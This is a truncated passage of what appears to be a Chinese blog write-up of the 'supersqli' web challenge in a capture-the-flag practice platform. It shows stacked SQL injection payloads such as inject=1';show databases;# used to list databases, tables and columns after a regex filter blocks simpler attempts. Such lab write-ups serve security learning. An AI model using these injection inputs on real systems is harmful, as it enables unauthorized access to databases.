攻防世界web進階區supersqli

打開鏈接,初步判斷應該是sql注入 順便查看一下源代碼,發現sqlmap沒有靈魂,估計應該不讓用,得手工注入 先1’,報錯 再–+,發現被正則過濾,大小寫也不行 看了看大佬的wp,堆疊注入(嗚,新名詞。。。) inject=1’;show databases;# inject=1’;show tables;# 看一下這幾個表 1’;show columns from words;# 1’;show
相關文章
相關標籤/搜索